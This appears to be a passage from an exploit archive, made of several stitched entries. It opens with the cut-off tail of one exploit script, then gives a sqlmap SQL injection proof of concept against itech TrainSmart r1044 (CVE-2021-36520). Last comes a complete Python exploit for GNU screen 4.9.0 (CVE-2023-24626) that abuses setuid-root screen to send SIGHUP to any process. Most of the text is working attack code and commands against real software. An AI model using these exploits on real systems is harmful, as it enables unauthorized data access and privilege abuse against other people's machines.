elif response.status_code == 403 and response.text == "The file is already existing":
cprint("[-] The file that you're trying to create is already on the server.", "red")
else:
cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red")
# Exploit Title: itech TrainSmart r1044 - SQL injection
# Date: 03.02.2023
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520
SQL injection vulnerability in itech TrainSmart r1044 allows remote
attackers to view sensitive information via crafted command using sqlmap.
PoC:
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs
# Exploit Title: GNU screen v4.9.0 - Privilege Escalation
# Date: 03.02.2023
# Exploit Author: Manuel Andreas
# Vendor Homepage: https://www.gnu.org/software/screen/
# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz
# Version: 4.9.0
# Tested on: Arch Linux
# CVE : CVE-2023-24626
import os
import socket
import struct
import argparse
import subprocess
import pty
import time
SOCKDIR_TEMPLATE = "/run/screens/S-{}"
MAXPATHLEN = 4096
MAXTERMLEN = 32
MAXLOGINLEN = 256
STRUCTSIZE = 12584
MSG_QUERY = 9
def find_latest_socket(dir):
return f"{dir}/{sorted(os.listdir(dir))[-1]}"
def build_magic(ver=5):
return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver
def build_msg(type):
return struct.pack("<ii", build_magic(), type) + MAXPATHLEN * b"T"
def build_query(auser, nargs, cmd, apid, preselect, writeback):
assert(len(auser) == MAXLOGINLEN + 1)
assert(len(cmd) == MAXPATHLEN)
assert(len(preselect) == 20)
assert(len(writeback) == MAXPATHLEN)
buf = build_msg(MSG_QUERY)
buf += auser
buf += 3 * b"\x00" #Padding
buf += struct.pack("<i", nargs)
buf += cmd
buf += struct.pack("<i", apid)
buf += preselect
buf += writeback
# Union padding
buf += (STRUCTSIZE - len(buf)) * b"P"
return buf
def spawn_screen_instance():
# provide a pty
mo, so = pty.openpty()
me, se = pty.openpty()
mi, si = pty.openpty()
screen = subprocess.Popen("/usr/bin/screen", bufsize=0, stdin=si, stdout=so, stderr=se, close_fds=True, env={"TERM":"xterm"})
for fd in [so, se, si]:
os.close(fd)
return screen
def main():
parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.')
parser.add_argument('pid', type=int, help='the pid to receive the signal')
args = parser.parse_args()
pid = args.pid
username = os.getlogin()
screen = spawn_screen_instance()
print("Waiting a second for screen to setup its socket..")
time.sleep(1)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username))
print(f"Connecting to: {socket_path}")
s.connect(socket_path)
print('Sending message...')
msg = build_query(username.encode('ascii') + (MAXLOGINLEN + 1 - len(username)) * b"\x00", 0, MAXPATHLEN * b"E", pid, 20 * b"\x00", MAXPATHLEN * b"D")
s.sendmsg([msg])
s.recv(512)
print(f'Ok sent SIGHUP to {pid}!')
screen.kill()
if __name__ == '__main__':
main()